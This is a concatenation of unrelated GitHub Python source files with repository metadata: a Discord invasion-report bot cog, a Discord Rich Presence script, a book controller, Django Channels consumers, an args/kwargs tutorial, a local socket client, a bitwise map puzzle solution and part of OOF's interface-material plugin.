@commands.command()\n async def inv(self):\n \"\"\"Receive the latest invasion info from the Toon Platoon.\"\"\"\n self.inv_dict = self.inv_json.json()['invasions']\n invs = \"The Toon Platoon has reported these invasions:\\n\"\n for (key, val) in self.inv_dict.items():\n if int(val['progress'].split('/')[1]) % 1000 == 0:\n summoned = \"Summoned\"\n else:\n summoned = \"Natural\"\n percent = \"{0:.0%}\".format(eval(val['progress']))\n inv_prop = [key, val['type'], val['progress'], percent, summoned]\n invs += ((\" **{0[1]}** invasion in *{0[0]}*:\\n\"\n \" Progress: {0[3]} ({0[2]})\\n\"\n \" Origin: {0[4]}\\n\").format(inv_prop))\n await self.bot.say(invs)\n\n\ndef setup(bot):\n \"\"\"Setup function.\"\"\"\n bot.add_cog(TTRInv(bot))\n","repo_name":"Epicord/epicord-bot","sub_path":"cogs/ttrinv.py","file_name":"ttrinv.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"11994414985","text":"from pypresence import Presence\r\nimport sys\r\nimport codecs\r\nimport time\r\nimport random\r\nimport json\r\n\r\n##\r\n## Functions\r\n##\r\n\r\n#Open .cfg files\r\ndef cfg_open(file:str,name:str):\r\n\ttry:\r\n\t\tf = codecs.open(file, \"r\", \"utf-8\")\r\n\texcept:\r\n\t\terror(f\"The file could not be found: {file}\")\r\n\t\treturn\r\n\r\n\tfor line in f:\r\n\t\tif \" = \" in line:\r\n\t\t\tkey = line.split(\" = \")[0]\r\n\t\t\tvalue = line.split(\" = \")[1]\r\n\t\telif \"=\" in line:\r\n\t\t\tkey = line.split(\"=\")[0]\r\n\t\t\tvalue = line.split(\"=\")[1]\r\n\t\telse: key = \"__none__\"\r\n\t\t\r\n\t\tif key == name and key != \"__none__\":\r\n\t\t\treturn value.replace(\"\\n\",\"\").replace(\"\\r\",\"\")\r\n\t\r\n\terror(f'Failed to find the parameter named \\\"{name}\\\"')\r\n\treturn\r\n\r\n#Error function\r\ndef error(text:str=\"An unknown error has occurred!\"):\r\n\tprint(\"[!] \"+text)\r\n\tinput(\"Press any key to exit . . . \")\r\n\tsys.exit()\r\n\r\n\r\n\r\n##\r\n## Main code\r\n##\r\n\r\n#Get client id\r\ntry:\r\n\tclient_id = int(cfg_open('config.cfg','client_id'))\r\nexcept: error('Parameter \\\"client_id\\\" must be an integer!')\r\n\r\n#Get update rate\r\ntry:\r\n\tupdate_rate = int(cfg_open('config.cfg','update_rate'))\r\n\tif update_rate < 15: update_rate = 15\r\nexcept: error('Parameter \\\"update_rate\\\" must be an integer!')\r\n\r\n#Get statuses\r\nstatuses_file = cfg_open('config.cfg','statuses_file')\r\nstatus_name = cfg_open('config.cfg','status_name')\r\ntry:\r\n\tstatus_type = int(cfg_open('config.cfg','status_type'))\r\nexcept: error('Parameter \\\"status_type\\\" must be an integer!')\r\n\r\n\r\n#Connection attempt\r\ntry:\r\n\tRPC = Presence(client_id)\r\n\tRPC.connect()\r\nexcept:\r\n\terror(\"Failed to start RPC. There are 2 possible options:\\n 1. You have entered an incorrect Client ID.\\n 2. You forgot to open desktop Discord.\")\r\n\r\n\r\n#Print\r\nprint(\"\\n\" * 25)\r\nprint(f\"##########################################\")\r\nprint(f\"# #\")\r\nprint(f\"# AdvRPC v0.1.2 successfully started! 
#\")\r\nprint(f\"# Developer: @dasalex #\")\r\nprint(f\"# #\")\r\nprint(f\"##########################################\\n\\n\")\r\n\r\n\r\n#Update status function\r\ndef update_status():\r\n\t#Open file\r\n\ttry:\r\n\t\twith open(statuses_file, \"r\",encoding='utf-8') as f: statuses = json.load(f)\r\n\texcept: error(f\"Failed to open file: {statuses_file}\")\r\n\t\r\n\t#Get status from file\r\n\tif status_type == 1: status = statuses[random.choice(list(statuses.keys()))]\r\n\telif status_type == 2:\r\n\t\ttry: status = statuses[status_name]\r\n\t\texcept: error(f'The specified status could not be found \\\"{status_name}\\\"!')\r\n\telse: status = statuses[list(statuses.keys())[0]]\r\n\r\n\t#Large image\r\n\tif \"large_image\" in status:\r\n\t\tif status[\"large_image\"].lower() == \"none\": status[\"large_image\"] = None\r\n\telse: status[\"large_image\"] = None\r\n\r\n\t#Large text\r\n\tif \"large_text\" in status:\r\n\t\tif status[\"large_text\"].lower() == \"none\": status[\"large_text\"] = None\r\n\telse: status[\"large_text\"] = None\r\n\r\n\t#Small image\r\n\tif \"small_image\" in status:\r\n\t\tif status[\"small_image\"].lower() == \"none\": status[\"small_image\"] = None\r\n\telse: status[\"small_image\"] = None\r\n\r\n\t#Small text\r\n\tif \"small_text\" in status:\r\n\t\tif status[\"small_text\"].lower() == \"none\": status[\"small_text\"] = None\r\n\telse: status[\"small_text\"] = None\r\n\r\n\t#Buttons\r\n\tif \"buttons\" in status:\r\n\t\tif len(status[\"buttons\"]) < 1: status[\"buttons\"] = None\r\n\telse: status[\"buttons\"] = None\r\n\r\n\t#Timer\r\n\tif \"timer\" in status:\r\n\t\tif status[\"timer\"].lower() == \"true\": status[\"timer\"] = int(time.time())\r\n\t\telse: status[\"timer\"] = None\r\n\telse:\r\n\t\tstatus[\"timer\"] = None\r\n\tif status_type == 1:\r\n\t\tstatus[\"timer\"] = None\r\n\r\n\t#Update RPC Status\r\n\tRPC.update(\r\n\t\tdetails=status[\"details\"],\r\n\t\tstate=status[\"state\"],\r\n\t\tlarge_image=status[\"large_image\"],\r\n\t\tlarge_text=status[\"large_text\"],\r\n\t\tsmall_image=status[\"small_image\"],\r\n\t\tsmall_text=status[\"small_text\"],\r\n\t\tstart=status[\"timer\"],\r\n\t\tbuttons=status[\"buttons\"]\r\n\t)\r\n\r\n\r\n#Open statuses file\r\ntry:\r\n\twith open(statuses_file, \"r\",encoding='utf-8') as f: statuses = json.load(f)\r\nexcept: error(f\"Failed to open file: {statuses_file}\")\r\n\r\n#Get statuses\r\nif status_type == 1: status = statuses[random.choice(list(statuses.keys()))]\r\nelif status_type == 2:\r\n\ttry: status = statuses[status_name]\r\n\texcept: error(f'The specified status could not be found \\\"{status_name}\\\"!')\r\nelse: status = statuses[list(statuses.keys())[0]]\r\n\r\n#Update status\r\nif status_type != 1 and status[\"timer\"].lower() == \"true\":\r\n\tupdate_status()\r\n\twhile True:\r\n\t\ttime.sleep(update_rate)\r\nelse:\r\n\twhile True:\r\n\t\tupdate_status()\r\n\t\ttime.sleep(update_rate)","repo_name":"dasalexua/advrpc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5896195683","text":"from DAL.Models.book import Book\nfrom DAL import book_services\n\ndef get_all_books():\n books = []\n db_call = book_services.get_all_books_db()\n for x in db_call:\n books.append(Book(title=x[1], author=x[2], description=x[3], read=x[4], id=x[0]))\n return books\n\ndef add_new_book(title, author, description, read):\n book = Book(title=title, author=author, 
description=description, read=read)\n    book_services.add_book_db(book)\n\ndef search_book_id(book_id):\n    db_call = book_services.search_book_id_db(book_id)\n    book = Book(title=db_call[1], author=db_call[2], description=db_call[3],id=db_call[0], read=db_call[4])\n    return book\n\ndef update_book(book_id, new_title=None, new_author=None, new_description=None, new_read=None):\n    db_call = book_services.update_book_db(book_id, new_title, new_author, new_description, new_read)\n    return Book(title=db_call[1], author=db_call[2], description=db_call[3],read=db_call[4] ,id=db_call[0])\n\ndef search_books_keyword(keyword):\n    books =[]\n    db_call = book_services.search_books_keyword_db(keyword)\n    for x in db_call:\n        books.append(Book(title=x[1], author=x[2], description=x[3],read=x[4], id=x[0]))\n    return books\n\ndef get_all_read_books():\n    books = []\n    db_call = book_services.get_all_read_books_db()\n    for x in db_call:\n        books.append(Book(title=x[1], author=x[2], description=x[3],read=x[4],id=x[0]))\n    return books\n","repo_name":"imlocle/library","sub_path":"BLL/book_controller.py","file_name":"book_controller.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17875392444","text":"import re\nimport datetime\nimport json\nfrom channels import Group\nfrom channels.sessions import channel_session\n\n\nfrom .models import User\nfrom .models import Message\nfrom .models import Trainer\nfrom .models import Admin\n\ndef datetime_handler(x):\n    if isinstance(x, datetime.datetime):\n        return x.isoformat()\n    raise TypeError(\"Unknown type\")\n\n\n@channel_session\ndef ws_connect(message):\n    print(\"WS_CONNECT\")\n    Group('admin', channel_layer=message.channel_layer).add(message.reply_channel)\n    Group('admin', channel_layer=message.channel_layer).send({'text': json.dumps(getAppState(), default = datetime_handler)})\n\n\n@channel_session\ndef ws_receive(message):\n\t# print(\"WS_RECEIVE\")\n\tdata = json.loads(message['text'])\n\tif data['type'] == \"sms\": # \"message\" is overloaded here, so trainer-to-user messages are called \"sms\"\n\t\tm = Message()\n\t\tm.send_message(data['sender'], data['receiver'], data['text'])\n\n\tif data['type'] == \"change_trainer\":\n\t\tuser_id = data['user_id']\n\t\ttrainer_id = data['trainer_id']\n\t\tuser = User.objects.get(user_id = user_id)\n\t\tuser.trainer_id = trainer_id\n\t\tuser.save()\n\n\tif data['type'] == \"change_trainer_status\":\n\t\ttrainer = Trainer.objects.get(id = data['trainer_id'])\n\t\ttrainer.active = data['trainer_status']\n\t\ttrainer.save()\n\n\tif data['type'] == 'remove_trainer':\n\t\ttrainer = Trainer.objects.get(id = data['trainer_id'])\n\t\ttrainer.delete()\n\t\tadmin = Admin.objects.get(id = data['trainer_id'])\n\t\tadmin.delete()\n\n\tif data['type'] == 'change_user_status':\n\t\tuser = User.objects.get(user_id = data['user_id'])\n\t\tuser.archive = bool(data['user_status'])\n\t\tuser.save()\n\n\n\n\tGroup('admin', channel_layer=message.channel_layer).send({'text':json.dumps(getAppState(), default = datetime_handler)})\n\n\n@channel_session\ndef ws_disconnect(message):\n\tprint(\"WS_DISCONNECT\")\n\n\ndef getAppState():\n\tresponse = []\n\titem = dict()\n\titem['type'] = 'trainers'\n\titem['data'] = [t for t in Trainer.objects.values()]\n\tresponse.append(item)\n\titem = dict()\n\titem['type'] = 'sms'\n\titem['data'] = [sms for sms in Message.objects.values()]\n\tresponse.append(item)\n\titem = dict()\n\titem['type'] = 'userlist'\n\titem['data'] = [u for u in User.objects.values()]\n\tresponse.append(item)\n\treturn response","repo_name":"alexey-kott/one_fit_chat_bot","sub_path":"bot/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1316667208","text":"# functions can take arguments positionally or as keywords\r\ndef fn(x, y): # here the arguments are positional, x comes before y\r\n    ''' raise the first argument to the power of the second argument'''\r\n    return x**y\r\n\r\n# here is a function that only expects positional arguments\r\ndef postitionalArg( *args ): # the asterisk tells python to expect positional arguments\r\n    print(type(args), args) # the positional arguments exist in a tuple\r\n    # we can act differently depending on how many arguments\r\n    if len(args) == 0:\r\n        print('function called with no arguments')\r\n    elif len(args)==1:\r\n        print('function called with a single argument')\r\n    else:\r\n        print('more than one argument passed in')\r\n\r\ndef keywordArgs( **kwargs ): # the double-asterisk indicates we expect keyword arguments\r\n    print(type(kwargs)) # the keyword arguments are gathered into a dictionary\r\n    for (k, v) in kwargs.items():\r\n        print(k, v)\r\n\r\nif __name__ == '__main__':\r\n    result = fn(y=2,x=3) # here we pass the arguments as keywords (not positional)\r\n    print(result)\r\n    # exercise the positional arguments function\r\n    postitionalArg()\r\n    postitionalArg(3)\r\n    postitionalArg(3, 2, 1, True, [], (), {})# we can pass as many or few positional arguments as we like\r\n    # exercise the keyword-arguments function\r\n    keywordArgs(x=1)# a single keyword argument\r\n    keywordArgs(y=2, z= True) # two keyword arguments\r\n    keywordArgs(a=(5,4,3)) # a single keyword argument\r\n","repo_name":"onionmccabbage/pythonIntroSept22","sub_path":"arg_kwarg.py","file_name":"arg_kwarg.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"43058489351","text":"'''client program'''\nfrom threading import Thread\nimport socket\n\n'''reciver func for recieving responce from server '''\ndef receiver(server):\n data = b''\n while True:\n try:\n data = server.recv(1024)\n except:\n break\n if data:\n print('server response: '+str(data.decode()))\n else:\n break\n \n\nhost = '127.0.0.1'\nport = 5000\ns = socket.socket()\ns.connect((host, port))\n\n'''func to take input from user '''\ndef main():\n message = input('-->')\n while message != 'x':\n s.send(message.encode())\n message = input()\n s.close()\n\n\nif __name__ == '__main__':\n #main thread to take user input\n t= Thread(target=main)\n #thread to recive responce\n t2=Thread(target=receiver,args=(s,))\n t.start()\n t2.start()\n t.join()\n t2.join()\n","repo_name":"mohithpothineni/CNF","sub_path":"m9/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30980418939","text":"def solution(n, arr1, arr2):\n answer = []\n for l1, l2 in zip(arr1, arr2):\n str = \"\"\n for i in range(n):\n if(l1 % 2 == 1 or l2 % 2 == 1):\n str += \"#\"\n else:\n str += \" \"\n l1 = l1 // 2\n l2 = l2 // 2\n answer.append(str[::-1])\n return answer\n\ndef solution2(n, arr1, arr2):\n answer = []\n for i,j in zip(arr1,arr2):\n a12 = str(bin(i|j)[2:])\n a12=a12.rjust(n,'0')\n a12=a12.replace('1','#')\n a12=a12.replace('0',' ')\n answer.append(a12)\n return answer\n\nn = 5\narr1 = [9, 20, 28, 18, 11]\narr2 = [30, 1, 21, 17, 28]\nresult = solution(n, arr1, arr2)\nfor i in result:\n print(i)","repo_name":"sang981113/CodingTest","sub_path":"secret_map.py","file_name":"secret_map.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2140934223","text":"from ooflib.SWIG.common import ooferror\nfrom ooflib.SWIG.common import pixelgroup\nfrom ooflib.SWIG.common import switchboard\nfrom ooflib.SWIG.engine import material\nfrom ooflib.common import labeltree\nfrom ooflib.common import microstructure\nfrom ooflib.common import registeredclass\nfrom ooflib.common import runtimeflags\nfrom ooflib.common import utils\nfrom ooflib.common.IO import mainmenu\nfrom ooflib.common.IO import microstructureIO\nfrom ooflib.common.IO import pixelgroupparam\nfrom ooflib.engine import bdycondition\nfrom ooflib.engine import materialmanager\nfrom ooflib.engine import skeletoncontext\nfrom ooflib.engine import skeletonelement\nfrom ooflib.engine import subproblemcontext\nfrom ooflib.engine.IO import interfaceparameters\nfrom ooflib.engine.IO import materialmenu\nfrom ooflib.engine.IO import materialparameter\nimport ooflib.engine.mesh\n\nimport sys\n\nNO_MATERIAL=interfaceparameters.NO_MATERIAL_STR\nNO_PIXELGROUP=interfaceparameters.NO_PIXELGROUP_STR\nNORTH=interfaceparameters.NORTH_STR\nSOUTH=interfaceparameters.SOUTH_STR\nEAST=interfaceparameters.EAST_STR\nWEST=interfaceparameters.WEST_STR\nANY=interfaceparameters.ANY_STR\n\n# Return type for getAdjacentElements -- not very complicated, but\n# nomenclature was a pretty big stumbling block to getting the\n# interfaces right, so we're being extra-careful. Left and right are\n# the elements whose materials correspond to the left-material and\n# right-material (or pixel group, etc.) 
of the interface.\nclass AdjacentElements:\n def __init__(self,left=None,right=None):\n self.left = left\n self.right = right\n def __nonzero__(self):\n # If either element is not None, then we're \"true\". Can't do\n # the obvious \"return self.left or self.right\", because this\n # can be None, but the allowed return values are True, False,\n # 0, or 1.\n if self.left or self.right:\n return True\n return False\n\n\n#Region outside of mesh divided into four\n#virtual materials or pixelgroups:\n#\n# \n# -------\n# | |\n# | | \n# | |\n# -------\n# \n#\n# North commences the bidding....\n\n\n# For some reason, just declining to register the plug-in doesn't\n# remove references to MATERIALTYPE_INTERFACE. So, we null it out\n# here. This egregious hackery will be removed once the surface stuff\n# is working, and then removed even more when we migrate to 3D.\ninterface_mat_type = None\nif runtimeflags.surface_mode:\n interface_mat_type = material.MATERIALTYPE_INTERFACE\n\n\nOOF = mainmenu.OOF\n\nclass InterfaceMSPlugIn(microstructure.MicrostructurePlugIn):\n def __init__(self, ms):\n microstructure.MicrostructurePlugIn.__init__(self, ms)\n self.namedinterfaces=utils.OrderedDict()\n self._materialassignments={}\n self._selectedInterfaceName=None\n\n self.sbcallbacks = [\n## switchboard.requestCallback(\"materials changed in microstructure\",\n## self.matChanged),\n## switchboard.requestCallback('destroy pixel group',\n## self.destpixgrp),\n## switchboard.requestCallback('changed pixel group', self.changedpixgrp)\n #TODO 3.1: Figure this out?\n #switchboard.requestCallback('changed pixel groups', self.chngdgrps)\n ]\n\n #TODO MER: Somehow use a timestamp in the mesh for interfaces (see mesh.py)\n\n## I don't know what parts of this are actually used. The switchboard\n## requests above were commented out, so I commented out their\n## callbacks too. I didn't follow through to find out which of the\n## other methods are only called by the callbacks, nor do I know why\n## the requests are commented out. (SAL, July 9, 2009)\n\n# #This is a response to an (un)assignment of a material to a microstructure\n# def matChanged(self, msobj):\n# # switchboard \"materials changed ...\"\n# #TODO 3.1: Make this more specific (like check if the material\n# #that was assigned or unassigned is part of an interface\n# #definition...) 
Would this clash with the other \"materials\n#     #changed...\" handlers?\n#         if msobj==self.microstructure:\n#             if len(self.namedinterfaces)>0:\n#                 #A rebuild is not triggered by changes in the\n#                 #skeleton boundaries\n#                 self.rebuildMeshes()\n\n#     def destpixgrp(self, group, ms_name):\n#         # switchboard 'destroy pixel group'\n#         self.deleteGroup(ms_name,group)\n\n#     #Reaction to \"changed pixel group\" similar to \"materials changed\n#     #in microstructure\"\n#     def changedpixgrp(self, group, ms_name):\n#         #Check if group is in the definition of one or more interfaces?\n#         if ms_name==self.microstructure.name():\n#             self.matChanged(self.microstructure)\n\n#     def deleteGroup(self,ms_name,group):\n#         if ms_name!=self.microstructure.name():\n#             return\n#         if len(self.namedinterfaces)==0:\n#             return\n#         interfacenames=self.getInterfaceNames()\n#         doomedinterfaces=[]\n#         for interfacename in interfacenames:\n#             interfaceobj=self.namedinterfaces[interfacename]\n#             if interfaceobj.hasGroup(group.name()):\n#                 del self.namedinterfaces[interfacename]\n#                 doomedinterfaces.append(interfacename)\n#         self.removeMaterialFromInterfaces(doomedinterfaces)\n#         #Remove boundary conditions that refer to the doomedinterfaces\n#         meshclass=ooflib.engine.mesh.meshes\n#         msname=self.microstructure.name()\n#         for meshkey in meshclass.keys(base=msname):\n#             meshctxt=meshclass[[msname]+meshkey]\n#             for doomedinterfacename in doomedinterfaces:\n#                 meshctxt.removeInterface(doomedinterfacename)\n#         self.rebuildMeshes()\n#         switchboard.notify(\"interface removed\",self.microstructure)\n\n    def renameGroup(self,oldgroupname,newgroupname):\n        for interfaceobj in self.namedinterfaces.values():\n            interfaceobj.renameGroup(oldgroupname,newgroupname)\n        #A group has been renamed; it is possible that the details of\n        #one or more interfaces have changed. 
\n switchboard.notify(\"interface renamed\",self.microstructure)\n\n def destroy(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n microstructure.MicrostructurePlugIn.destroy(self)\n\n def interfaceInfo(self,interfacename):\n try:\n return self.namedinterfaces[interfacename].__repr__()\n except KeyError:\n return \"\"\n\n def getInterfaceNames(self):\n return self.namedinterfaces.keys()[:]\n\n #Returns strings of the form \"skeleton:bdkey\"\n def getSkelBdyNames(self):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n names.append(skelkey[0]+\":\"+bname)\n return names\n\n #Return skeleton boundary names in skeleton skelname\n def getOneSkelBdyNames(self,skelname):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n if skelkey[0]!=skelname:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n names.append(bname)\n return names\n\n #Return skeleton boundary names common to all skeletons\n def getCommonSkelBdyNames(self):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n namedict={}\n numskels=len(skelclass.keys(base=msname))\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n try:\n namedict[bname]=namedict[bname]+1\n except KeyError:\n namedict[bname]=1\n names=[]\n for bname,count in namedict.items():\n if count==numskels:\n names.append(bname)\n return names\n\n def getInterfaceNamesWithMaterial(self,matname):\n try:\n names=self._materialassignments[matname][:]\n return names\n except KeyError:\n return []\n\n def getSkelBdyNamesWithMaterial(self,matname):\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n names=[]\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==matname:\n names.append(skelkey[0]+\":\"+bname)\n return names\n\n #Get material assigned to interfacename\n def getInterfaceMaterialName(self,interfacename):\n for matname, interfacenamelist in self._materialassignments.items():\n if interfacename in interfacenamelist:\n return matname\n return None\n\n #This method returns materials assigned to interfaces and boundaries.\n #In contrast, materialmanager.getInterfaceMaterialNames returns\n #all interface materials listed on the Materials page.\n def getInterfaceMaterials(self):\n matdict={}\n for matname, interfacenames in self._materialassignments.items():\n if len(interfacenames)>0:\n matdict[matname]=1\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial is not None:\n matdict[bdyctxt._interfacematerial]=1\n return matdict.keys()\n\n def addInterface(self,name,interfacedef):\n self.namedinterfaces[name]=interfacedef\n switchboard.notify(\"new interface created\",self.microstructure)\n self.selectInterface(name)\n self.rebuildMeshes()\n\n def removeInterface(self,name):\n try:\n del self.namedinterfaces[name]\n 
interfacenames=self.getInterfaceNames()\n doomedinterfaces=[name]\n #Because of the possibility of compound interfaces (e.g. union),\n #we must search the other interfaces for the presence\n #of the interface corresponding to name.\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n if interfaceobj.hasInterface(name):\n del self.namedinterfaces[interfacename]\n doomedinterfaces.append(interfacename)\n self.removeMaterialFromInterfaces(doomedinterfaces)\n self.unselectInterface()\n # #Remove boundary conditions that refer to the doomedinterfaces\n # meshclass=ooflib.engine.mesh.meshes\n # msname=self.microstructure.name()\n # for meshkey in meshclass.keys(base=msname):\n # meshctxt=meshclass[[msname]+meshkey]\n # for doomedinterfacename in doomedinterfaces:\n # meshctxt.removeInterface(doomedinterfacename)\n self.rebuildMeshes()\n switchboard.notify(\"interface removed\",self.microstructure)\n except KeyError:\n pass\n\n def getCurrentReservedNames(self):\n reservednamedict={}\n for iname in self.getInterfaceNames():\n reservednamedict[iname]=1\n skelclass=skeletoncontext.skeletonContexts\n msname=self.microstructure.name()\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allBoundaryNames():\n reservednamedict[bname]=1\n reservednamedict['top']=1\n reservednamedict['bottom']=1\n reservednamedict['left']=1\n reservednamedict['right']=1\n reservednamedict['topleft']=1\n reservednamedict['topright']=1\n reservednamedict['bottomleft']=1\n reservednamedict['bottomright']=1\n return reservednamedict.keys()\n\n def renameInterface(self,oldname,newname):\n if oldname==newname:\n return\n if newname in self.getCurrentReservedNames():\n raise ooferror.ErrSetupError(\"Name %s already in use.\" % newname)\n try:\n obj=self.namedinterfaces[oldname]\n del self.namedinterfaces[oldname]\n self.namedinterfaces[newname]=obj\n interfacenames=self.getInterfaceNames()\n #Because of the possibility of compound interfaces (e.g. union),\n #we must search the other interfaces for the presence\n #of the interface corresponding to oldname.\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n interfaceobj.renameInterface(oldname,newname)\n #interface must also be renamed in the list of\n #material assignments\n matname=self.getInterfaceMaterialName(oldname)\n self.removeMaterialFromInterfaces([oldname])\n self.assignMaterialToInterfaces(matname,[newname])\n #Rename the interface in the boundary conditions\n #and in the edgements.\n meshclass=ooflib.engine.mesh.meshes\n msname=self.microstructure.name()\n for meshkey in meshclass.keys(base=msname):\n meshctxt=meshclass[[msname]+meshkey]\n meshctxt.renameInterface(oldname,newname)\n self.selectInterface(newname)\n switchboard.notify(\"interface renamed\",self.microstructure)\n except KeyError:\n pass\n\n #Assign material (matname) to interfaces and boundaries in the list interfacenames\n def assignMaterialToInterfaces(self,matname,interfacenames,skeletonname=None):\n \n #Extract the skeleton boundary names from interfacenames.\n #The skeleton boundaries are not listed in _materialassignments.\n #The interfacematerial is an attribute of the\n #skeleton context edge boundary. 
This way,\n #we do not have to explicitly handle changes in the\n #names of skeletons and skeleton boundaries.\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n skelbdynamesdict={}\n for skelkey in skelclass.keys(base=msname):\n if skeletonname!=interfaceparameters.SkelAllParameter.extranames[0] and \\\n skeletonname!=skelkey[0]:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n if bname in interfacenames:\n skelbdynamesdict[bname]=1\n bdyctxt=skelctxt.getBoundary(bname)\n bdyctxt._interfacematerial=matname\n\n #Remove skeleton boundary names from interfacenames\n for bname in skelbdynamesdict:\n interfacenames.remove(bname)\n\n #First unassign interfacenames from any material\n self.removeMaterialFromInterfaces(interfacenames,skeletonname)\n try:\n interfacenamelist=self._materialassignments[matname]\n #After the call to removeMaterialFromInterfaces above,\n #there should be no duplicates in the sum on the right hand side\n self._materialassignments[matname]=interfacenamelist+interfacenames\n except KeyError:\n self._materialassignments[matname]=interfacenames[:]\n\n## print \"assignments to interfaces\", self._materialassignments\n## print \"all assigned materials\", self.getInterfaceMaterials()\n \n #Remove the interfaces indicated in interfacenames from their material\n #assignments\n def removeMaterialFromInterfaces(self,interfacenames,skeletonname=None):\n #The skeleton boundaries are not listed in _materialassignments.\n #The interfacematerial is an attribute of the\n #skeleton context edge boundary. This way,\n #we do not have to explicitly handle changes in the\n #names of skeletons and skeleton boundaries.\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n if skeletonname!=interfaceparameters.SkelAllParameter.extranames[0] and \\\n skeletonname!=skelkey[0]:\n continue\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n if bname in interfacenames:\n bdyctxt=skelctxt.getBoundary(bname)\n bdyctxt._interfacematerial=None\n\n for matname, interfacenamelist in self._materialassignments.items():\n for interfacename in interfacenames:\n if interfacename in interfacenamelist:\n interfacenamelist.remove(interfacename)\n \n #Implement changes to the interfaces when a material is deleted\n #in the materials page. 
If the material is an interface material,\n #remove entry for this material in _materialassignments.\n #If the material is a bulk material, interfaces that have this\n #material as an attribute are removed.\n #TODO 3.1: For a union of interfaces, not necessary to delete the whole\n #union.\n def deleteMaterial(self,matname,material_type):\n # if material_type==material.MATERIALTYPE_INTERFACE:\n if material_type == interface_mat_type:\n try:\n del self._materialassignments[matname]\n except KeyError:\n pass\n #Unassociate matname from skeleton boundaries\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==matname:\n bdyctxt._interfacematerial=None\n else:\n if len(self.namedinterfaces)==0:\n return\n interfacenames=self.getInterfaceNames()\n doomedinterfaces=[]\n for interfacename in interfacenames:\n interfaceobj=self.namedinterfaces[interfacename]\n if interfaceobj.hasBulkMaterial(matname):\n del self.namedinterfaces[interfacename]\n doomedinterfaces.append(interfacename)\n self.removeMaterialFromInterfaces(doomedinterfaces)\n #Remove boundary conditions that refer to the doomedinterfaces\n meshclass=ooflib.engine.mesh.meshes\n msname=self.microstructure.name()\n for meshkey in meshclass.keys(base=msname):\n meshctxt=meshclass[[msname]+meshkey]\n for doomedinterfacename in doomedinterfaces:\n meshctxt.removeInterface(doomedinterfacename)\n self.rebuildMeshes()\n switchboard.notify(\"interface removed\",self.microstructure)\n\n def renameMaterial(self,oldmatname,newmatname,material_type):\n # if material_type==material.MATERIALTYPE_INTERFACE:\n if material_type==interface_mat_type:\n try:\n interfacenamelist=self._materialassignments[oldmatname]\n del self._materialassignments[oldmatname]\n self._materialassignments[newmatname]=interfacenamelist\n except KeyError:\n pass\n #Rename materials associated with skeleton boundaries\n msname=self.microstructure.name()\n skelclass=skeletoncontext.skeletonContexts\n for skelkey in skelclass.keys(base=msname):\n skelctxt=skelclass[[msname]+skelkey]\n for bname in skelctxt.allEdgeBoundaryNames():\n bdyctxt=skelctxt.getBoundary(bname)\n if bdyctxt._interfacematerial==oldmatname:\n bdyctxt._interfacematerial=newmatname\n else:\n for interfaceobj in self.namedinterfaces.values():\n interfaceobj.renameBulkMaterial(oldmatname,newmatname)\n #A material has been renamed, it is possible the details of\n #one or more interfaces have been changed. \n switchboard.notify(\"interface renamed\",self.microstructure)\n\n # The selected interface isn't actually used for anything directly,\n # but it's displayed in the GUI and its name is passed in as an\n # argument to commands that operate on interfaces. 
